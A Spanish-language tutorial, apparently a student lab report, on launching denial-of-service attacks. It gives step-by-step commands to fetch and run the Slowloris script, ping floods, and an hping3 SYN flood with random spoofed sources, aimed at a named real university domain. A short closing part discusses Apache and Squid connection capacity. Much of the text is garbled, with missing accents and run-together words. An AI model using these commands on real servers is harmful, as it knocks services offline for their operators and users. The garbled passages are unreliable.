ATAQUE CON SLOWLORIS A SERVIDORES APACHE VULNERABLES ATAQUES DoS
(Denegacion de Servicio) Se genera mediante la saturacin de los
puertos con flujo de informacin, haciendo que el servidor se
sobrecargue y no pueda seguir prestando servicios; por eso se lo
denomina denegacin,pues hace que el servidor no de abasto a la
cantidad de solicitudes. Esta tcnica es usada por los llamados
crackers para dejar fuera de servicio a servidores objetivo. Para
esta prctica vamos a utilizar bajo Kali Linux un sencillo script
hecho en PERL, implementa una potente e inteligente manera de
generar una denegacin de servicio sobre un servidor Web Apache.
Para ello, se basa en la cantidad de peticiones que es capaz de
mantener un servidor web de forma concurrente. La forma de saturar
el pool de servicios es mediante la creacin de request HTTP (con
HTTPs tambin funciona) de manera que empiezan a enviar cabeceras y
ms cabeceras al servidor de manera que asi se fuerza a mantener
abiertas las conexiones por parte del servidor. Los servidores web
tienen determinado un nmero mximo global de sockets permitidos. 1.-
Accedemos a Kali Linux 2.- Ingresamos la siguiente direccin en
nuestro navegador para obtener el script slowloris el cual nos
permitir realizar el ataque:ha.ckers.org/slowloris/slowloris.pl 3.-
Copiamos el cdigo y lo guardamos en un archivo en el escritorio con
el nombre slowloris.pl 4.- Requisitos: Este es un programa Perl que
requiere el intrprete Perl con los mdulos;IO :: socket :: INET, IO
:: Socket :: SSL, y Getopt Para ello instalamos de la siguiente
manera: perl MCPAN e install IO::Socket::INET perl MCPAN e install
IO::Socket::SSL sudo apt-get install libgetopt-mixed-perl sudo
apt-get install perl doc 5.- Una vez instalados los componentes
necesarios procedemos a realizar el ataque DoS, para ello debemos
dar permisos sobre el achivo creado slowloris.pl, mediante: # cd
Desktop # ls # chmod 777 slowloris.pl 6.- Ejecutamos el ataque a un
servidor WEB objetivo mediante la instruccin: #
perl./slowloris.pldns www.uti.edu.ecport 80timeout 1num 1000cache
INUNDACION DE ICMP Es una tcnica que pretende agotar el ancho de
banda de la vctima. Consiste en enviar de forma continuada un nmero
elevado de paquetes ICMP, (ping) de tamao considerable a la vctima,
de forma que esta ha de responder con paquetes, lo que supone una
sobrecarga tanto de la red como en el sistema de la vctima.
Dependiendodelarelacinentrelacapacidaddeprocesamientodelavctimayelatacante,el
grado de sobrecarga vara, es decir, si un atacante tiene una
capacidad mucho mayor, la vctima no puede manejar el trfico
generado.
Elcomandohping3,esunanalizador/ensambladordepaquetesTCP/IPdeusoenmodoconsola,
hpingnosoloescapazdeenviarpaquetesICMP,sinoademstambinpuedeenviarpaquetes
TCP, UDP, y RAW-IP Por ejemplosiqueremos
hacerunataquesimplequesobrecargueelprocesamiento orespuesta de un x
computador conectado a la red lo hacemos mediante la instruccin: #
ping 192.168.1.5 l 5000 t Esto enviara cada segundo 5000 paquetes
continuamente saturando el canal y por ende afectando la respuesta
de la pc vctima. Otro derivado de este es: #ping t a uti.edu.ec n
10000 Esto har que se enven 10000 solicitudes de ping a la pgina y
se sature, aunque es mejor si hay varias pc atacantes realizando la
misma accin contra el servidor o pc vctima.
EnKaliLinuxsepuedehacerusodelcomandohping3ypodemosverconunsniffercomo
wireshark,comosecapturaeltrficoenviadohaciaunaterminalelegida,ylacargaqueeste
soporta: Ahora reforzando un poco la instruccin: # hping3 c 10000 d
120 S w 64 p 21 flood rand-source www.uti.edu.ec Donde: Hping3:
comando a utilizar-c 10000: nmero de paquetes a enviar -d 120:
tamao de cada paquete enviado -S : solo se enva paquetes SYN -w 64:
Tamao de ventana TCP -p 80 : Puerto de destino --flood : Envo rpido
de paquetes, sin tener cuidado de mostrar respuestas entrantes
--rand-source : Uso de direcciones IP origen al azar, tambin se
puede usar ao spoof para ocultar los nombres de host www.uti.edu.ec
: direccin de destino o victima Demostracin:
Podemosvercomoenunossegundossehainundadolaredconmsde600000paquetes
transmitidos de forma ininterrumpida, esto suele causar que la red
se colapse, impidiendo a otros
usuariospoderutilizarla,yaquehpingnodejaespacioentrepaquete-paquete,paraqueotras
mquinas transmitan ningn otro tipo de informacin. CUANTAS
CONEXIONES SOPORTA ACTUALMENTE APACHE SQUID?
Estodependedelhardware(Servidor)quesehaconfigurado,yaquesquidyapacheconsumen
CPU, RAM, a de ms que debe tener una buena tarjeta de red que
soporte las conexiones puede ser de 100/1000 Mbps.
Esdetomarmuyencuentaademseltipodeswitchutilizadoyaquealrealizarlaconexinen
cascada puede ralentizar la red gravemente.
Unservidorcorrectamenteconfiguradopuedesoportarde100a150estacionesdetrabajo,
conectadas de forma simultnea, aconsejable utilizar un backbone si
se utiliza en cascada.